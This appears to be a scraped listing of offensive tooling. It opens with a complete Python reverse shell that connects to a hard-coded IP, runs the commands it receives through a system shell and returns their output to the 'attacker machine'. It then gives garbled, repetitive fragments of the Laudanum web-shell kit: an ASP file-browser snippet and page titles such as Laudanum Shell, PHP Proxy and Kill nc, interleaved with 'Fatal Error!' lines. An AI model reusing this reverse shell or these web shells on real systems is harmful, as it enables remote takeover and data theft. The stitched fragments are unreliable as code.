| # This piece of software code is licensed under the FreeBSD license.. 6 | # 7 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 8 | import socket,subprocess 9 | HOST = '172.16.32.137' # The remote host 10 | PORT = 443 # The same port as used by the server 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | # connect to attacker machine 13 | s.connect((HOST, PORT)) 14 | # send we are connected 15 | s.send('[*] Connection Established!') 16 | # start loop 17 | while 1: 18 | # recieve shell command 19 | data = s.recv(1024) 20 | # if its quit, then break out and close socket 21 | if data == "quit": break 22 | # do shell command 23 | proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 24 | # read output 25 | stdout_value = proc.stdout.read() + proc.stderr.read() 26 | # send output to attacker 27 | s.send(stdout_value) 28 | # close socket 29 | s.close() 30 | --------------------------------------------------------------------------------

DNS Query 0.1

Laudanum File Browser 0.1

Listing of: <% 140 | list = split(folder.path, "\") 141 | temppath = "" 142 | for each i in list 143 | temppath = temppath & i & "\" 144 | %><%=i%>\ <% 145 | next 146 | %>

Fatal Error!

Laudanum ASP Proxy

Fatal Error!

DNS Query 0.1

Fatal Error!

Laudanum File Browser 0.1

Can't open directory

Fatal Error!

Host Lookup 0.1

Fatal Error!

Kill nc 0.1

Fatal Error!

Laudanum PHP Proxy

Fatal Error!

Laudanum Shell

Fatal Error!

DNS Query 0.1

Fatal Error!

Laudanum File Browser 0.1

Can't open directory

Fatal Error!

Host Lookup 0.1

Fatal Error!

Kill nc 0.1

Fatal Error!

Laudanum PHP Proxy

Laudanum Tools

Fatal Error!

Laudanum Shell